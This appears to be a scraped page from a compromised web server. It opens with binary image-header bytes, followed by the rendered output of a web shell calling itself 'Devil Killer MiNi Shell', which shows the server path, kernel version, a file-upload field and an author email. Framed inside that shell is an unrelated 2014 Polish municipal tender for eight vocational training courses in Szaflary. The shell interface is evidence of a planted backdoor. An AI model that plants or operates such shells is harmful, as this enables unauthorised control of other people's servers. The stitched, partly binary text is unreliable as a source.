JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140507/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140507/97711-N-2014.html

<p class="kh_header"><b>Szaflary: Zorganizowanie i przeprowadzenie kursów dla uczestników projektu systemowego pt. Aktywizacja osób zagrożonych wykluczeniem społecznym w gminie Szaflary</b><br>
<b>Numer ogłoszenia: 97711 - 2014; data zamieszczenia: 07.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Szaflarach , ul. Zakopiańska 18, 34-424 Szaflary, woj. małopolskie, tel. 18 2612329, faks 18 2612329.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-szaflary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów dla uczestników projektu systemowego pt. Aktywizacja osób zagrożonych wykluczeniem społecznym w gminie Szaflary.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: 
Przedmiotem zamówienia jest wyłonienie instytucji, której zadaniem będzie zorganizowanie i przeprowadzenie w okresie miesięcy: 16 czerwca  do listopada  2014r.  usług szkoleniowych kursów w częściach 1, 2, 3, 4, 5, 6, 7, 8 pn.:

Część 1. Kurs obsługi kasy fiskalnej z fakturowaniem - dla 6 osób, liczba godzin 20. 
Celem szkolenia jest zdobycie niezbędnej wiedzy teoretycznej i praktycznych umiejętności potrzebnych do samodzielnego obsługiwania kasy fiskalnej stacjonarnej i przenośnej oraz fakturowania.
Okres realizacji zadania: lipiec 2014r.

Część 2. Kurs sprzedawcy z obsługa kasy fiskalnej - dla 11 osób, liczba godzin 30.
Celem szkolenia jest zdobycie niezbędnej wiedzy teoretycznej, a przede wszystkim praktycznych umiejętności potrzebnych do pracy na stanowisku handlowym.
Okres realizacji zadania: lipiec 2014r.

Część 3. Kurs ABC Przedsiębiorczości - dla 11 osób, liczba godzin 16.
Celem szkolenia jest zdobycie niezbędnej wiedzy w szczególności z zakresu zakładania i prowadzenia własnej działalności gospodarczej  w tym możliwości uzyskiwania dotacji, kredytu na ten cel,wybranych zagadnień z prawa pracy z uwzględnieniem podstawowych praw i obowiązków pracodawcy i pracownika. 
Okres realizacji zadania: 01 do 24 październik 2014r.

Część 4.Kurs szycia firan i zasłon  - dla 2 osób, liczba godzin teoretycznych 20, 
praktycznych 60. 
Celem szkolenia jest zdobycie niezbędnej wiedzy teoretycznej, a przede wszystkim praktycznych umiejętności krawcowej o specjalności -szycie firan i zasłon. Kurs przeznaczony jest dla osób poczatkujących. 
Okres realizacji zadania: lipiec- 15 wrzesień 2014r.

Część 5. Kurs Kucharza - dla 1 osoby,  liczba godzin teoretycznych 30, liczba godzin praktycznych 110.
Celem kursu jest zdobycie wiedzy, umiejętności i kwalifikacji w zawodzie kucharza dających możliwość pracy przede wszystkim  na stanowisku kucharza zarówno w małej gastronomii jak i w dużych przedsiębiorstwach gastronomicznych. Program kursu powinien obejmować w szczególności następujące zagadnienia: strukturę organizacyjną zakładu gastronomicznego, podstawy systemu HACCP, procesy technologiczne stosowane w produkcji żywności i ich praktyczne stosowanie w sztuce kulinarnej  sporządzanie potraw z wykorzystaniem warzyw i owoców, sporządzanie wywarów, sosów i marynat, sporządzanie potraw z jaj i przetworów mleczarskich, sporządzanie zup, sporządzanie potraw jarskich i półmięsnych, sporządzanie potraw mięsnych, sporządzanie potraw rybnych, sporządzanie przekąsek zimnych i gorących, sporządzanie deserów, praktyczne wprowadzenie w zagadnienia kuchni cateringowej, zarządzanie lokalem gastronomicznym. Zajęcia praktyczne winny odbywać się w jednej lub kilku restauracjach itp., które organizują przyjęcia, imprezy na minimum 50 osób.
Zajęcia powinny odbywać się w dni robocze w godzinach miedzy 8:00 a 18:00, a zajęcia praktyczne mogą odbywać się miedzy 8.00 a 20:00 także w dni weekendowe.
Okres realizacji zadania:  lipiec- 15 wrzesień 2014r.
 
Część 6. Kurs ratownika wodnego I, II, III  etap wraz z wymaganym egzaminem - liczba godzin 63 - uzupełniony o Kurs Kwalifikowanej Pierwszej Pomocy wraz z wymaganym egzaminem - liczba godzin  66  - dla 1 osoby dorosłej.
Celem szkolenia jest nabycie kwalifikacji do pracy zawodowej Ratownika Wodnego zgodnie z   obowiązującymi przepisami w tym zakresie.  
a)Realizacja zadania  w zakresie Kursu ratownika wodnego musi spełniać wymogi określone w przepisach prawa w tym zakresie tj. Ustawą z dn. 18 sierpnia 2011r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. 2011r., Nr 208, poz. 1240) oraz Rozporządzeniem Ministra Spraw Wewnętrznych z dn. 21 czerwca 2012r. w sprawie szkoleń w ratownictwie wodnym (Dz.U. 2012, poz.747),
b)Realizacja zadania  w zakresie Kursu Kwalifikowalnej Pierwszej Pomocy musi spełniać wymogi określone w przepisach prawa w tym zakresie tj. Rozporządzenia Ministra Spraw Wewnętrznych i Administracji oraz Ministra Obrony Narodowej z dnia 12 grudnia 2008 r.  Dz.U.2008. poz.1537 z późn. zm. w sprawie szkoleń w zakresie kwalifikowanej pierwszej pomocy.
Zajęcia powinny odbywać się w dni robocze  w godzinach miedzy 8:00 a 18:00, a zajęcia praktyczne mogą odbywać się miedzy 8.00 a 20:00 także w dni weekendowe.
Zadanie zostanie uznane za wykonane po uzyskaniu przez uczestnika stosownych zaświadczeń o ukończeniu szkolenia Kurs ratownika wodnego I, II, III  etap oraz Kurs Kwalifikowanej Pierwszej Pomocy i uznaniu za przygotowanych do złożenia stosownych egzaminów  (pozytywnie złożone egzaminy wewnętrzne- jeżeli są wymagane) lub dokumentacji potwierdzającej przystąpienie do egzaminów kończących kursy j.w.
Okres realizacji zadania: 16 czerwiec- listopad 2014r.

Część 7. Kursu prawa jazdy kat. B z egzaminem państwowym i badaniami lekarskimi - dla 16 osób. Liczba godzin teoretycznych 30, liczba godzin praktycznych 30.
Zadanie obejmuje przeprowadzenie badań lekarskich w związku z przystąpieniem do kursu oraz 30 godzin zajęć teoretycznych , 30 godzin zegarowych zajęć indywidualnych praktycznych nauki jazdy z każdym z uczestników, opłatę pierwszego egzaminu państwowego i dowóz na niniejszy egzamin.
Cena kursu winna zawierać wszystkie wymienione elementy. 
Realizacja zadania musi spełniać wymogi określone w przepisach prawa krajowego w tym zakresie tj. Rozporządzenia Ministra Infrastruktury z dnia 27.10.2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów (Dz.U.Nr 217 poz.1834 z 2005r. z późn. zm).
Zajęcia powinny odbywać się w dni robocze  w godzinach miedzy 8:00 a 18:00, a zajęcia praktyczne mogą odbywać się miedzy 8.00 a 20:00 także w dni weekendowe.
Zadanie zostanie uznane za wykonane po uzyskaniu przez uczestników zaświadczeń 
o ukończeniu szkolenia podstawowego dla osób ubiegających się o prawo jazdy kat. B 
i uznaniu za przygotowanych do złożenia egzaminu państwowego (pozytywnie złożony 
egzamin wewnętrzny) oraz dokumentacji potwierdzającej przystąpienie do egzaminu państwowego.
Okres realizacji zadania: 04 sierpień- 22 wrzesień 2014r.

Część 8. Kursu prawa jazdy kat. C z egzaminem państwowym,  wymaganymi badaniami lekarskimi w tym psychologicznymi/i orzeczeniem lekarskim - dla 1 osoby. Liczba godzin teoretycznych 30, liczba godzin praktycznych 30.
Zadanie obejmuje przeprowadzenie badań lekarskich w związku z przystąpieniem do kursu oraz 30 godzin zajęć teoretycznych nauki jazdy, 20 godzin zegarowych zajęć indywidualnych praktycznych nauki jazdy z każdym z uczestników, opłatę pierwszego egzaminu państwowego i dowóz na niniejszy egzamin. Cena kursu winna zawierać wszystkie wymienione elementy.
Realizacja zadania musi spełniać wymogi określone w przepisach prawa krajowego w tym zakresie tj. Rozporządzenia Ministra Infrastruktury z dnia 27.10.2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów (Dz.U.Nr 217 poz.1834 z 2005r. z późn. zm).
Zajęcia powinny odbywać się w dni robocze  w godzinach miedzy 8:00 a 18:00, a zajęcia praktyczne mogą odbywać się miedzy 8.00 a 20:00 w dni weekendowe. 
Zadanie zostanie uznane za wykonane po uzyskaniu przez uczestników zaświadczeń 
o ukończeniu szkolenia podstawowego dla osób ubiegających się o prawo jazdy kat. C 
i uznaniu za przygotowanych do złożenia egzaminu państwowego (pozytywnie złożony 
egzamin wewnętrzny) oraz dokumentacji potwierdzającej przystąpienie do egzaminu państwowego.
 Okres realizacji zadania: lipiec -sierpień 2014r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich trzech lat, przeszkolił co najmniej, po 2 osoby dla każdej z części osobno (w zależności na jakie części zostanie złożona oferta).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje specjalistami posiadającymi wiedzę teoretyczną oraz przygotowanie praktyczne w zakresie tematyki szkoleń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu według załącznika nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularze ofertowe, stanowiące załączniki nr 1 do SWIZ,
2. wykaz osób do kontaktu, /według załącznika nr 8 do SIWZ/
3. wypełniony program szkoleniowy zał. nr 9 do SIWZ ( dla każdego szkolenia oddzielnie)
4. oświadczenie załącznik nr 11 do SIWZ
5. załącznik nr 12 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń objętych zamówieniem - 30</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w następujących okolicznościach:
zaistnienie, po zawarciu umowy, w przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
1.	o charakterze niezależnym od stron,
2.	którego strony nie mogły przewidzieć przed zawarciem umowy, 
3.	którego nie można uniknąć ani któremu strony nie mogły zapobiec,
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: 
1.	powódź, 
2.	pożar, i inne klęski żywiołowe, 
3.	zamieszki, strajki, ataki terrorystyczne, działania wojenne, 
4.	nagłe załamanie warunków atmosferycznych, 
5.	nagłe przerwy w dostawie energii elektrycznej, 
6.	promieniowanie lub skażenia.

Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia:

1.	Powstanie rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
2.	Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie mogą ulec termin realizacji umowy oraz terminy wynikające z harmonogramu;
3.	Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia oraz osób realizujących zamówienie po wcześniejszym uzgodnieniu z Zamawiającym z zastrzeżeniem, że zmiennik musi posiadać nie mniejsze doświadczenie i kwalifikacje.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops-szaflary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Szaflarach, ul. Zakopiańska 18, 34 - 424 Szaflary 
w sekretariacie pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2014 godzina 13:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Szaflarach, ul. Zakopiańska 18, 34 - 424 Szaflary 
w sekretariacie pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków 
Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com